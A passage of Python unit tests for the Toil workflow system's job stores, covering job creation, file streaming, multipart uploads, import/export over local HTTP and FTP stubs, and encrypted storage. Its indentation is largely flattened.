jobstore = self.jobstore_initialized
# Create a job and verify its existence/properties
aJobNode = JobNode(command='parent1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onParent',
jobStoreID=None, predecessorNumber=0)
job = jobstore.create(aJobNode)
self.assertTrue(jobstore.exists(job.jobStoreID))
self.assertEqual(job.command, 'parent1')
self.assertEqual(job.memory, self.parentJobReqs['memory'])
self.assertEqual(job.cores, self.parentJobReqs['cores'])
self.assertEqual(job.disk, self.parentJobReqs['disk'])
self.assertEqual(job.preemptable, self.parentJobReqs['preemptable'])
self.assertEqual(job.jobName, 'test1')
self.assertEqual(job.unitName, 'onParent')
self.assertEqual(job.stack, [])
self.assertEqual(job.predecessorNumber, 0)
self.assertEqual(job.predecessorsFinished, set())
self.assertEqual(job.logJobStoreFileID, None)
@travis_test
def testConfigEquality(self):
"""
Ensure that the command line configurations are successfully loaded and stored.
            In setUp() self.jobstore_initialized is created and initialized. In this test, after creating newJobStore,
.resume() will look for a previously instantiated job store and load its config options. This is expected
to be equal but not the same object.
"""
newJobStore = self._createJobStore()
newJobStore.resume()
self.assertEqual(newJobStore.config, self.config)
self.assertIsNot(newJobStore.config, self.config)
@travis_test
def testJobLoadEquality(self):
"""Tests that a job loaded into one jobstore from another can be used equivalently by another."""
# Create a job on the first jobstore.
jobNode1 = JobNode(command='jobstore1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onJS1',
jobStoreID=None, predecessorNumber=0)
job1 = self.jobstore_initialized.create(jobNode1)
# Load it onto the second jobstore
job2 = self.jobstore_resumed_noconfig.load(job1.jobStoreID)
self.assertEqual(job1, job2)
@travis_test
def testChildLoadingEquality(self):
"""Test that loading a child job operates as expected."""
aJobNode = JobNode(command='parent1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onParent',
jobStoreID=None, predecessorNumber=0)
jobNodeOnChild = JobNode(command='child1',
requirements=self.childJobReqs1,
jobName='test2', unitName='onChild1',
jobStoreID=None)
job = self.jobstore_initialized.create(aJobNode)
childJob = self.jobstore_initialized.create(jobNodeOnChild)
job.stack.append(childJob)
self.jobstore_initialized.update(job)
self.assertEqual(self.jobstore_initialized.load(childJob.jobStoreID), childJob)
@travis_test
        def testPersistentFilesToDelete(self):
"""
Make sure that updating a job carries over filesToDelete.
The following demonstrates the job update pattern, where files to be deleted are referenced in
"filesToDelete" array, which is persisted to disk first. If things go wrong during the update, this list of
files to delete is used to remove the unneeded files.
"""
# Create a job.
jobNode = JobNode(command='job1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onJS1',
jobStoreID=None, predecessorNumber=0)
job = self.jobstore_initialized.create(jobNode)
job.filesToDelete = ['1', '2']
self.jobstore_initialized.update(job)
self.assertEqual(self.jobstore_initialized.load(job.jobStoreID).filesToDelete, ['1', '2'])
@travis_test
def testUpdateBehavior(self):
"""Tests the proper behavior during updating jobs."""
jobstore1 = self.jobstore_initialized
jobstore2 = self.jobstore_resumed_noconfig
aJobNode = JobNode(command='parent1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onParent',
jobStoreID=None, predecessorNumber=0)
jobNodeOnChild1 = JobNode(command='child1',
requirements=self.childJobReqs1,
jobName='test2', unitName='onChild1',
jobStoreID=None)
jobNodeOnChild2 = JobNode(command='child2',
requirements=self.childJobReqs2,
jobName='test3', unitName='onChild2',
jobStoreID=None)
job1 = jobstore1.create(aJobNode)
job2 = jobstore2.load(job1.jobStoreID)
# Create child jobs.
childJob1 = jobstore2.create(jobNodeOnChild1)
childJob2 = jobstore2.create(jobNodeOnChild2)
# Add them to job2.
job2.stack.append((childJob1, childJob2))
jobstore2.update(job2)
# Check equivalence between jobstore1 and jobstore2.
# While job1 and job2 share a jobStoreID, job1 has not been "refreshed" to show the newly added child jobs.
self.assertNotEqual(job2, job1)
# Reload parent job on jobstore, "refreshing" the job.
job1 = jobstore1.load(job1.jobStoreID)
self.assertEqual(job2, job1)
# Load children on jobstore and check equivalence
self.assertEqual(jobstore1.load(childJob1.jobStoreID), childJob1)
self.assertEqual(jobstore1.load(childJob2.jobStoreID), childJob2)
self.assertEqual(job1, job2) # The jobs should both have children now...
self.assertIsNot(job1, job2) # but should not be the same.
@travis_test
def testChangingJobStoreID(self):
"""
Tests that changing the jobStoreID makes jobs unequivalent.
Create two job trees, jobstore1 & jobstore2 consisting of a parent and 5 child jobs. The children of
jobstore2 will be copied from jobstore1. Changing the jobstoreFileID on each child on jobstore1 will cause
them to be different jobs. After updating the children of jobstore2, they should be equal.
"""
jobstore1 = self.jobstore_initialized
jobstore2 = self.jobstore_resumed_noconfig
# Create a job
aJobNode = JobNode(command='parent1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onParent',
jobStoreID=None, predecessorNumber=0)
# Load the job onto the two jobstores.
parentJob1 = jobstore1.create(aJobNode)
parentJob2 = jobstore2.load(parentJob1.jobStoreID)
# Create an array of child jobs for each jobstore.
for i in range(0, 5):
jobNodeOnChild1 = JobNode(command='child' + str(i),
requirements=self.childJobReqs1,
jobName='test' + str(i), unitName='onChild1',
jobStoreID=None)
aChildJob = jobstore1.create(jobNodeOnChild1)
parentJob1.stack.append(aChildJob)
jobstore2.load(aChildJob.jobStoreID)
# Compare children before and after update.
for childJob in parentJob2.stack:
self.assertEqual(childJob, jobstore1.load(childJob.jobStoreID))
childJob.logJobStoreFileID = str(uuid.uuid4())
childJob.remainingRetryCount = 66
self.assertNotEqual(childJob, jobstore1.load(childJob.jobStoreID))
# Update the children on the second jobstore.
for childJob in parentJob2.stack:
jobstore2.update(childJob)
# Check that the jobs are equivalent after being reloaded.
for childJob in parentJob2.stack:
self.assertEqual(jobstore1.load(childJob.jobStoreID), childJob)
self.assertEqual(jobstore2.load(childJob.jobStoreID), childJob)
@travis_test
def testJobDeletions(self):
"""Tests the consequences of deleting jobs."""
# A local jobstore object for testing.
jobstore = self.jobstore_initialized
jobNodeOnParent = JobNode(command='job1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onJob',
jobStoreID=None, predecessorNumber=0)
# Create jobs
job = jobstore.create(jobNodeOnParent)
# Create child Jobs
jobNodeOnChild1 = JobNode(command='child1',
requirements=self.childJobReqs1,
jobName='test2', unitName='onChild1',
jobStoreID=None)
jobNodeOnChild2 = JobNode(command='job1',
requirements=self.childJobReqs2,
jobName='test3', unitName='onChild2',
jobStoreID=None)
# Add children to parent.
child1 = jobstore.create(jobNodeOnChild1)
child2 = jobstore.create(jobNodeOnChild2)
job.stack.append((child1, child2))
jobstore.update(job)
# Reminder: We are accessing the -1st element because we just appended.
# However, there should only be one element.
childJobs = [jobstore.load(childNode.jobStoreID) for childNode in job.stack[-1]]
            # Test job iterator - the results of the iterator are affected by eventual
            # consistency. We cannot guarantee all jobs will appear, but we can assert that all
            # jobs that show up are a subset of all existing jobs. If we had deleted jobs before
            # this, we would have to worry about ghost jobs appearing, and this assertion would
            # not be valid.
self.assertTrue(set(childJobs + [job]) >= set(jobstore.jobs()))
# Test job deletions
# First delete parent, this should have no effect on the children
self.assertTrue(jobstore.exists(job.jobStoreID))
jobstore.delete(job.jobStoreID)
self.assertFalse(jobstore.exists(job.jobStoreID))
# Check the deletion of children
for childJob in childJobs:
self.assertTrue(jobstore.exists(childJob.jobStoreID))
jobstore.delete(childJob.jobStoreID)
self.assertFalse(jobstore.exists(childJob.jobStoreID))
self.assertRaises(NoSuchJobException, jobstore.load, childJob.jobStoreID)
try:
with jobstore.readSharedFileStream('missing') as _:
pass
self.fail('Expecting NoSuchFileException')
except NoSuchFileException:
pass
@travis_test
def testSharedFiles(self):
"""Tests the sharing of files."""
jobstore1 = self.jobstore_initialized
jobstore2 = self.jobstore_resumed_noconfig
bar = 'bar'
if sys.version_info >= (3, 0):
bar = b'bar'
with jobstore1.writeSharedFileStream('foo') as f:
f.write(bar)
# ... read that file on worker, ...
with jobstore2.readSharedFileStream('foo') as f:
self.assertEqual(bar, f.read())
# ... and read it again on jobstore1.
with jobstore1.readSharedFileStream('foo') as f:
self.assertEqual(bar, f.read())
with jobstore1.writeSharedFileStream('nonEncrypted', isProtected=False) as f:
f.write(bar)
self.assertUrl(jobstore1.getSharedPublicUrl('nonEncrypted'))
self.assertRaises(NoSuchFileException, jobstore1.getSharedPublicUrl, 'missing')
@travis_test
def testPerJobFiles(self):
"""Tests the behavior of files on jobs."""
jobstore1 = self.jobstore_initialized
jobstore2 = self.jobstore_resumed_noconfig
# Create jobNodeOnJS1
jobNodeOnJobStore1 = JobNode(command='job1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onJobStore1',
jobStoreID=None, predecessorNumber=0)
# First recreate job
jobOnJobStore1 = jobstore1.create(jobNodeOnJobStore1)
fileOne = jobstore2.getEmptyFileStoreID(jobOnJobStore1.jobStoreID, cleanup=True)
# Check file exists
self.assertTrue(jobstore2.fileExists(fileOne))
self.assertTrue(jobstore1.fileExists(fileOne))
one = 'one'
two = 'two'
three = 'three'
if sys.version_info >= (3, 0):
one = b'one'
two = b'two'
three = b'three'
# ... write to the file on jobstore2, ...
with jobstore2.updateFileStream(fileOne) as f:
f.write(one)
# ... read the file as a stream on the jobstore1, ....
with jobstore1.readFileStream(fileOne) as f:
self.assertEqual(f.read(), one)
# ... and copy it to a temporary physical file on the jobstore1.
fh, path = tempfile.mkstemp()
try:
os.close(fh)
tmpPath = path + '.read-only'
jobstore1.readFile(fileOne, tmpPath)
try:
shutil.copyfile(tmpPath, path)
finally:
os.unlink(tmpPath)
with open(path, 'rb+') as f:
self.assertEqual(f.read(), one)
# Write a different string to the local file ...
f.seek(0)
f.truncate(0)
f.write(two)
# ... and create a second file from the local file.
fileTwo = jobstore1.writeFile(path, jobOnJobStore1.jobStoreID, cleanup=True)
with jobstore2.readFileStream(fileTwo) as f:
self.assertEqual(f.read(), two)
# Now update the first file from the local file ...
jobstore1.updateFile(fileOne, path)
with jobstore2.readFileStream(fileOne) as f:
self.assertEqual(f.read(), two)
finally:
os.unlink(path)
# Create a third file to test the last remaining method.
with jobstore2.writeFileStream(jobOnJobStore1.jobStoreID, cleanup=True) as (f, fileThree):
f.write(three)
with jobstore1.readFileStream(fileThree) as f:
self.assertEqual(f.read(), three)
# Delete a file explicitly but leave files for the implicit deletion through the parent
jobstore2.deleteFile(fileOne)
# Check the file is gone
#
for store in jobstore2, jobstore1:
self.assertFalse(store.fileExists(fileOne))
self.assertRaises(NoSuchFileException, store.readFile, fileOne, '')
try:
with store.readFileStream(fileOne) as _:
pass
self.fail('Expecting NoSuchFileException')
except NoSuchFileException:
pass
@travis_test
def testStatsAndLogging(self):
"""Tests behavior of reading and writting stats and logging."""
jobstore1 = self.jobstore_initialized
jobstore2 = self.jobstore_resumed_noconfig
jobNodeOnJobStore1 = JobNode(command='job1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onJobStore1',
jobStoreID=None, predecessorNumber=0)
jobOnJobStore1 = jobstore1.create(jobNodeOnJobStore1)
# Test stats and logging
stats = None
one = b'one' if not USING_PYTHON2 else 'one'
two = b'two' if not USING_PYTHON2 else 'two'
            # Callback passed to readStatsAndLogging to collect whatever stats were written.
def callback(f2):
stats.add(f2.read())
# Collects stats and logging messages.
stats = set()
# No stats or logging added yet. Expect nothing.
self.assertEqual(0, jobstore1.readStatsAndLogging(callback))
self.assertEqual(set(), stats)
# Test writing and reading.
jobstore2.writeStatsAndLogging(one)
self.assertEqual(1, jobstore1.readStatsAndLogging(callback))
self.assertEqual({one}, stats)
self.assertEqual(0, jobstore1.readStatsAndLogging(callback)) # readStatsAndLogging purges saved stats etc
jobstore2.writeStatsAndLogging(one)
jobstore2.writeStatsAndLogging(two)
stats = set()
self.assertEqual(2, jobstore1.readStatsAndLogging(callback))
self.assertEqual({one, two}, stats)
largeLogEntry = os.urandom(self._largeLogEntrySize())
stats = set()
jobstore2.writeStatsAndLogging(largeLogEntry)
self.assertEqual(1, jobstore1.readStatsAndLogging(callback))
self.assertEqual({largeLogEntry}, stats)
# test the readAll parameter
self.assertEqual(4, jobstore1.readStatsAndLogging(callback, readAll=True))
# Delete parent
jobstore1.delete(jobOnJobStore1.jobStoreID)
self.assertFalse(jobstore1.exists(jobOnJobStore1.jobStoreID))
# TODO: Who deletes the shared files?
@travis_test
def testWriteLogFiles(self):
"""Test writing log files."""
jobNames = ['testStatsAndLogging_writeLogFiles']
jobLogList = ['string', b'bytes', '', b'newline\n']
config = self._createConfig()
setattr(config, 'writeLogs', '.')
setattr(config, 'writeLogsGzip', None)
StatsAndLogging.writeLogFiles(jobNames, jobLogList, config)
jobLogFile = os.path.join(config.writeLogs, jobNames[0] + '000.log')
self.assertTrue(os.path.isfile(jobLogFile))
with open(jobLogFile, 'r') as f:
self.assertEqual(f.read(), 'string\nbytes\n\nnewline\n')
os.remove(jobLogFile)
@travis_test
def testBatchCreate(self):
"""Test creation of many jobs."""
jobstore = self.jobstore_initialized
jobRequirements = dict(memory=12, cores=34, disk=35, preemptable=True)
jobGraphs = []
with jobstore.batch():
for i in range(100):
overlargeJobNode = JobNode(command='overlarge',
requirements=jobRequirements,
jobName='test-overlarge', unitName='onJobStore',
jobStoreID=None, predecessorNumber=0)
jobGraphs.append(jobstore.create(overlargeJobNode))
for jobGraph in jobGraphs:
self.assertTrue(jobstore.exists(jobGraph.jobStoreID))
@travis_test
def testGrowingAndShrinkingJob(self):
"""Make sure jobs update correctly if they grow/shrink."""
# Make some very large data, large enough to trigger
# overlarge job creation if that's a thing
# (i.e. AWSJobStore)
arbitraryLargeData = os.urandom(500000)
job = self.jobstore_initialized.create(self.arbitraryJob)
# Make the job grow
job.foo_attribute = arbitraryLargeData
self.jobstore_initialized.update(job)
check_job = self.jobstore_initialized.load(job.jobStoreID)
self.assertEqual(check_job.foo_attribute, arbitraryLargeData)
# Make the job shrink back close to its original size
job.foo_attribute = None
self.jobstore_initialized.update(job)
check_job = self.jobstore_initialized.load(job.jobStoreID)
self.assertEqual(check_job.foo_attribute, None)
def _prepareTestFile(self, store, size=None):
"""
Generates a URL that can be used to point at a test file in the storage mechanism
used by the job store under test by this class. Optionally creates a file at that URL.
:param: store: an object referencing the store, same type as _createExternalStore's
return value
:param int size: The size of the test file to be created.
:return: the URL, or a tuple (url, md5) where md5 is the file's hexadecimal MD5 digest
:rtype: str|(str,str)
"""
raise NotImplementedError()
@abstractmethod
def _hashTestFile(self, url):
"""
Returns hexadecimal MD5 digest of the contents of the file pointed at by the URL.
"""
raise NotImplementedError()
@abstractmethod
def _createExternalStore(self):
raise NotImplementedError()
@abstractmethod
def _cleanUpExternalStore(self, store):
"""
:param: store: an object referencing the store, same type as _createExternalStore's
return value
"""
raise NotImplementedError()
externalStoreCache = {}
def _externalStore(self):
try:
store = self.externalStoreCache[self]
except KeyError:
logger.debug('Creating new external store for %s', self)
store = self.externalStoreCache[self] = self._createExternalStore()
else:
logger.debug('Reusing external store for %s', self)
return store
@classmethod
def cleanUpExternalStores(cls):
for test, store in iteritems(cls.externalStoreCache):
logger.debug('Cleaning up external store for %s.', test)
test._cleanUpExternalStore(store)
mpTestPartSize = 5 << 20
@classmethod
def makeImportExportTests(cls):
testClasses = [FileJobStoreTest, AWSJobStoreTest, GoogleJobStoreTest]
activeTestClassesByName = {testCls.__name__: testCls
for testCls in testClasses
if not getattr(testCls, '__unittest_skip__', False)}
def testImportExportFile(self, otherCls, size, moveExports):
"""
:param AbstractJobStoreTest.Test self: the current test case
:param AbstractJobStoreTest.Test otherCls: the test case class for the job store
to import from or export to
:param int size: the size of the file to test importing/exporting with
"""
# Prepare test file in other job store
self.jobstore_initialized.partSize = cls.mpTestPartSize
self.jobstore_initialized.moveExports = moveExports
                # The string passed to otherCls() is an arbitrary test method name; the
                # instance only needs access to ._externalStore() and ._prepareTestFile()
other = otherCls('testSharedFiles')
store = other._externalStore()
srcUrl, srcMd5 = other._prepareTestFile(store, size)
# Import into job store under test
jobStoreFileID = self.jobstore_initialized.importFile(srcUrl)
self.assertTrue(isinstance(jobStoreFileID, FileID))
with self.jobstore_initialized.readFileStream(jobStoreFileID) as f:
fileMD5 = hashlib.md5(f.read()).hexdigest()
self.assertEqual(fileMD5, srcMd5)
# Export back into other job store
dstUrl = other._prepareTestFile(store)
self.jobstore_initialized.exportFile(jobStoreFileID, dstUrl)
self.assertEqual(fileMD5, other._hashTestFile(dstUrl))
if otherCls.__name__ == 'FileJobStoreTest':
if isinstance(self.jobstore_initialized, FileJobStore):
jobStorePath = self.jobstore_initialized._getFilePathFromId(jobStoreFileID)
jobStoreHasLink = os.path.islink(jobStorePath)
if self.jobstore_initialized.moveExports:
# Ensure the export performed a move / link
self.assertTrue(jobStoreHasLink)
self.assertEqual(os.path.realpath(jobStorePath), dstUrl[7:])
else:
# Ensure the export has not moved the job store file
self.assertFalse(jobStoreHasLink)
# Remove local Files
os.remove(srcUrl[7:])
os.remove(dstUrl[7:])
make_tests(testImportExportFile, cls, otherCls=activeTestClassesByName,
size=dict(zero=0,
one=1,
oneMiB=2 ** 20,
partSizeMinusOne=cls.mpTestPartSize - 1,
partSize=cls.mpTestPartSize,
partSizePlusOne=cls.mpTestPartSize + 1),
moveExports={'deactivated': None, 'activated': True})
def testImportSharedFile(self, otherCls):
"""
:param AbstractJobStoreTest.Test self: the current test case
:param AbstractJobStoreTest.Test otherCls: the test case class for the job store
to import from or export to
"""
# Prepare test file in other job store
self.jobstore_initialized.partSize = cls.mpTestPartSize
other = otherCls('testSharedFiles')
store = other._externalStore()
srcUrl, srcMd5 = other._prepareTestFile(store, 42)
# Import into job store under test
self.assertIsNone(self.jobstore_initialized.importFile(srcUrl, sharedFileName='foo'))
with self.jobstore_initialized.readSharedFileStream('foo') as f:
fileMD5 = hashlib.md5(f.read()).hexdigest()
self.assertEqual(fileMD5, srcMd5)
if otherCls.__name__ == 'FileJobStoreTest': # Remove local Files
os.remove(srcUrl[7:])
make_tests(testImportSharedFile,
cls,
otherCls=activeTestClassesByName)
@travis_test
def testImportHttpFile(self):
'''Test importing a file over HTTP.'''
http = socketserver.TCPServer(('', 0), StubHttpRequestHandler)
try:
httpThread = threading.Thread(target=http.serve_forever)
httpThread.start()
try:
assignedPort = http.server_address[1]
url = 'http://localhost:%d' % assignedPort
with self.jobstore_initialized.readFileStream(
self.jobstore_initialized.importFile(url)) as readable:
f1 = readable.read()
f2 = StubHttpRequestHandler.fileContents
if isinstance(f1, bytes) and not isinstance(f2, bytes):
f1 = f1.decode()
if isinstance(f2, bytes) and not isinstance(f1, bytes):
f1 = f1.encode()
self.assertEqual(f1, f2)
finally:
http.shutdown()
httpThread.join()
finally:
http.server_close()
@travis_test
def testImportFtpFile(self):
'''Test importing a file over FTP'''
ftpfile = {'name': 'foo', 'content': 'foo bar baz qux'}
ftp = FTPStubServer(0)
ftp.run()
try:
ftp.add_file(**ftpfile)
assignedPort = ftp.server.server_address[1]
url = 'ftp://user1:passwd@localhost:%d/%s' % (assignedPort, ftpfile['name'])
with self.jobstore_initialized.readFileStream(self.jobstore_initialized.importFile(url)) as readable:
imported_content = readable.read()
# python 2/3 string/bytestring compat
if isinstance(imported_content, bytes):
imported_content = imported_content.decode('utf-8')
self.assertEqual(imported_content, ftpfile['content'])
finally:
ftp.stop()
@slow
def testFileDeletion(self):
"""
            Intended to cover the batch deletion of items in the AWSJobStore, but it doesn't hurt
            to run it against the other job stores.
"""
n = self._batchDeletionSize()
for numFiles in (1, n - 1, n, n + 1, 2 * n):
job = self.jobstore_initialized.create(self.arbitraryJob)
fileIDs = [self.jobstore_initialized.getEmptyFileStoreID(job.jobStoreID, cleanup=True) for _ in
range(0, numFiles)]
self.jobstore_initialized.delete(job.jobStoreID)
for fileID in fileIDs:
# NB: the fooStream() methods return context managers
self.assertRaises(NoSuchFileException, self.jobstore_initialized.readFileStream(fileID).__enter__)
@slow
def testMultipartUploads(self):
"""
            This test is meant to cover multi-part uploads in the AWSJobStore, but it doesn't hurt
            to run it against the other job stores as well.
"""
# http://unix.stackexchange.com/questions/11946/how-big-is-the-pipe-buffer
bufSize = 65536
partSize = self._partSize()
self.assertEqual(partSize % bufSize, 0)
job = self.jobstore_initialized.create(self.arbitraryJob)
# Test file/stream ending on part boundary and within a part
for partsPerFile in (1, 2.33):
checksum = hashlib.md5()
checksumQueue = Queue(2)
# FIXME: Having a separate thread is probably overkill here
def checksumThreadFn():
while True:
_buf = checksumQueue.get()
if _buf is None:
break
checksum.update(_buf)
# Multipart upload from stream
checksumThread = Thread(target=checksumThreadFn)
checksumThread.start()
try:
# Should not block. On Linux, /dev/random blocks when it's running low on entropy
with open('/dev/urandom', 'rb') as readable:
with self.jobstore_initialized.writeFileStream(job.jobStoreID, cleanup=True) as (
writable, fileId):
for i in range(int(partSize * partsPerFile / bufSize)):
buf = readable.read(bufSize)
checksumQueue.put(buf)
writable.write(buf)
finally:
checksumQueue.put(None)
checksumThread.join()
before = checksum.hexdigest()
# Verify
checksum = hashlib.md5()
with self.jobstore_initialized.readFileStream(fileId) as readable:
while True:
buf = readable.read(bufSize)
if not buf:
break
checksum.update(buf)
after = checksum.hexdigest()
self.assertEqual(before, after)
# Multi-part upload from file
checksum = hashlib.md5()
fh, path = tempfile.mkstemp()
try:
with os.fdopen(fh, 'wb+') as writable:
with open('/dev/urandom', 'rb') as readable:
for i in range(int(partSize * partsPerFile / bufSize)):
buf = readable.read(bufSize)
writable.write(buf)
checksum.update(buf)
fileId = self.jobstore_initialized.writeFile(path, job.jobStoreID, cleanup=True)
finally:
os.unlink(path)
before = checksum.hexdigest()
# Verify
checksum = hashlib.md5()
with self.jobstore_initialized.readFileStream(fileId) as readable:
while True:
buf = readable.read(bufSize)
if not buf:
break
checksum.update(buf)
after = checksum.hexdigest()
self.assertEqual(before, after)
self.jobstore_initialized.delete(job.jobStoreID)
@travis_test
def testZeroLengthFiles(self):
'''Test reading and writing of empty files.'''
job = self.jobstore_initialized.create(self.arbitraryJob)
nullFile = self.jobstore_initialized.writeFile('/dev/null', job.jobStoreID, cleanup=True)
with self.jobstore_initialized.readFileStream(nullFile) as f:
assert not f.read()
with self.jobstore_initialized.writeFileStream(job.jobStoreID, cleanup=True) as (f, nullStream):
pass
with self.jobstore_initialized.readFileStream(nullStream) as f:
assert not f.read()
self.jobstore_initialized.delete(job.jobStoreID)
@slow
def testLargeFile(self):
'''Test the reading and writing of large files.'''
# Write a large file.
dirPath = self._createTempDir()
filePath = os.path.join(dirPath, 'large')
hashIn = hashlib.md5()
with open(filePath, 'wb') as f:
for i in range(0, 10):
buf = os.urandom(self._partSize())
f.write(buf)
hashIn.update(buf)
# Load the file into a jobstore.
job = self.jobstore_initialized.create(self.arbitraryJob)
jobStoreFileID = self.jobstore_initialized.writeFile(filePath, job.jobStoreID, cleanup=True)
# Remove the local file.
os.unlink(filePath)
# Write a local copy of the file from the jobstore.
self.jobstore_initialized.readFile(jobStoreFileID, filePath)
# Reread the file to confirm success.
hashOut = hashlib.md5()
with open(filePath, 'rb') as f:
while True:
buf = f.read(self._partSize())
if not buf:
break
hashOut.update(buf)
self.assertEqual(hashIn.digest(), hashOut.digest())
def assertUrl(self, url):
prefix, path = url.split(':', 1)
if prefix == 'file':
self.assertTrue(os.path.exists(path))
else:
try:
urlopen(Request(url))
except:
self.fail()
@slow
def testCleanCache(self):
# Make a bunch of jobs
jobstore = self.jobstore_initialized
# Create parent job
rootJob = jobstore.createRootJob(self.arbitraryJob)
# Create a bunch of child jobs
for i in range(100):
child = jobstore.create(self.arbitraryJob)
rootJob.stack.append([child])
jobstore.update(rootJob)
# See how long it takes to clean with no cache
noCacheStart = time.time()
jobstore.clean()
noCacheEnd = time.time()
noCacheTime = noCacheEnd - noCacheStart
# Make sure we have all the jobs: root and children.
self.assertEqual(len(list(jobstore.jobs())), 101)
# See how long it takes to clean with cache
jobCache = {jobGraph.jobStoreID: jobGraph
for jobGraph in jobstore.jobs()}
cacheStart = time.time()
jobstore.clean(jobCache)
cacheEnd = time.time()
cacheTime = cacheEnd - cacheStart
logger.debug("Without cache: %f, with cache: %f.", noCacheTime, cacheTime)
# Running with the cache should be faster.
self.assertTrue(cacheTime <= noCacheTime)
# NB: the 'thread' method seems to be needed here to actually
# ensure the timeout is raised, probably because the only
# "live" thread doesn't hold the GIL.
@travis_test
@pytest.mark.timeout(45, method='thread')
def testPartialReadFromStream(self):
"""Test whether readFileStream will deadlock on a partial read."""
job = self.jobstore_initialized.create(self.arbitraryJob)
with self.jobstore_initialized.writeFileStream(job.jobStoreID, cleanup=True) as (f, fileID):
# Write enough data to make sure the writer thread
# will get blocked on the write. Technically anything
# greater than the pipe buffer size plus the libc
# buffer size (64K + 4K(?)) should trigger this bug,
# but this gives us a lot of extra room just to be sure.
# python 3 requires self.fileContents to be a bytestring
a = 'a'
if sys.version_info >= (3, 0):
a = b'a'
f.write(a * 300000)
with self.jobstore_initialized.readFileStream(fileID) as f:
self.assertEqual(f.read(1), a)
# If it times out here, there's a deadlock
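        @staticmethod
        def _pipeBufferSketch():
            """Hedged sketch, not part of the original suite: an OS pipe
            buffers only ~64K, so a writer thread blocks once the reader
            stops consuming -- the deadlock testPartialReadFromStream
            guards against. Non-blocking writes probe the limit safely."""
            import os
            import fcntl
            r, w = os.pipe()
            flags = fcntl.fcntl(w, fcntl.F_GETFL)
            fcntl.fcntl(w, fcntl.F_SETFL, flags | os.O_NONBLOCK)
            written = 0
            try:
                while True:
                    written += os.write(w, b'a' * 4096)
            except OSError:
                pass  # pipe buffer full; a blocking writer would hang here
            finally:
                os.close(r)
                os.close(w)
            return written  # typically 65536 on Linux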
@abstractmethod
def _corruptJobStore(self):
"""
Deletes some part of the physical storage represented by a job store.
"""
raise NotImplementedError()
@slow
def testDestructionOfCorruptedJobStore(self):
self._corruptJobStore()
jobstore = self._createJobStore()
jobstore.destroy()
# Note that self.jobstore_initialized.destroy() is done as part of shutdown
@travis_test
def testDestructionIdempotence(self):
# Jobstore is fully initialized
self.jobstore_initialized.destroy()
# Create a second instance for the same physical storage but do not .initialize() or
# .resume() it.
cleaner = self._createJobStore()
cleaner.destroy()
# And repeat
self.jobstore_initialized.destroy()
cleaner = self._createJobStore()
cleaner.destroy()
@travis_test
def testEmptyFileStoreIDIsReadable(self):
"""Simply creates an empty fileStoreID and attempts to read from it."""
id = self.jobstore_initialized.getEmptyFileStoreID()
fh, path = tempfile.mkstemp()
try:
self.jobstore_initialized.readFile(id, path)
self.assertTrue(os.path.isfile(path))
finally:
os.unlink(path)
def _largeLogEntrySize(self):
"""
Sub-classes may want to override these in order to maximize test coverage
"""
return 1 * 1024 * 1024
def _batchDeletionSize(self):
return 10
def _partSize(self):
return 5 * 1024 * 1024
class AbstractEncryptedJobStoreTest(object):
# noinspection PyAbstractClass
class Test(with_metaclass(ABCMeta, AbstractJobStoreTest.Test)):
"""
A test of job stores that use encryption
"""
def setUp(self):
# noinspection PyAttributeOutsideInit
self.sseKeyDir = tempfile.mkdtemp()
super(AbstractEncryptedJobStoreTest.Test, self).setUp()
def tearDown(self):
super(AbstractEncryptedJobStoreTest.Test, self).tearDown()
shutil.rmtree(self.sseKeyDir)
def _createConfig(self):
config = super(AbstractEncryptedJobStoreTest.Test, self)._createConfig()
sseKeyFile = os.path.join(self.sseKeyDir, 'keyFile')
with open(sseKeyFile, 'w') as f:
f.write('01234567890123456789012345678901')
config.sseKey = sseKeyFile
# config.attrib['sse_key'] = sseKeyFile
return config
def testEncrypted(self):
"""
Create an encrypted file. Read it in encrypted mode then try with encryption off
to ensure that it fails.
"""
phrase = 'This file is encrypted.'.encode('utf-8')
fileName = 'foo'
with self.jobstore_initialized.writeSharedFileStream(fileName, isProtected=True) as f:
f.write(phrase)
with self.jobstore_initialized.readSharedFileStream(fileName) as f:
self.assertEqual(phrase, f.read())
# disable encryption
self.jobstore_initialized.config.sseKey = None
try:
with self.jobstore_initialized.readSharedFileStream(fileName) as f:
self.assertEqual(phrase, f.read())
except AssertionError as e:
self.assertEqual("Content is encrypted but no key was provided.", e.args[0])
else:
self.fail("Read encryption content with encryption off.")
class FileJobStoreTest(AbstractJobStoreTest.Test):
def _createJobStore(self):
# Make a FileJobStore with an artificially low fan out threshold, to
# make sure to test fan out logic
return FileJobStore(self.namePrefix, fanOut=2)
def _corruptJobStore(self):
assert isinstance(self.jobstore_initialized, FileJobStore) # type hint
shutil.rmtree(self.jobstore_initialized.jobStoreDir)
def _prepareTestFile(self, dirPath, size=None):
fileName = 'testfile_%s' % uuid.uuid4()
        localFilePath = os.path.join(dirPath, fileName)
url = 'file://%s' % localFilePath
if size is None:
return url
else:
content = os.urandom(size)
with open(localFilePath, 'wb') as writable:
writable.write(content)
return url, hashlib.md5(content).hexdigest()
def _hashTestFile(self, url):
localFilePath = FileJobStore._extractPathFromUrl(urlparse.urlparse(url))
with open(localFilePath, 'rb') as f:
return hashlib.md5(f.read()).hexdigest()
def _createExternalStore(self):
return tempfile.mkdtemp()
def _cleanUpExternalStore(self, dirPath):
shutil.rmtree(dirPath)
@travis_test
def testPreserveFileName(self):
"Check that the fileID ends with the given file name."
fh, path = tempfile.mkstemp()
try:
os.close(fh)
job = self.jobstore_initialized.create(self.arbitraryJob)
fileID = self.jobstore_initialized.writeFile(path, job.jobStoreID, cleanup=True)
self.assertTrue(fileID.endswith(os.path.basename(path)))
finally:
os.unlink(path)
@needs_google
class GoogleJobStoreTest(AbstractJobStoreTest.Test):
projectID = os.getenv('TOIL_GOOGLE_PROJECTID')
headers = {"x-goog-project-id": projectID}
def _createJobStore(self):
from toil.jobStores.googleJobStore import GoogleJobStore
return GoogleJobStore(GoogleJobStoreTest.projectID + ":" + self.namePrefix)
def _corruptJobStore(self):
# The Google job store has only one resource, the bucket, so we can't corrupt it without
# fully deleting it.
pass
def _prepareTestFile(self, bucket, size=None):
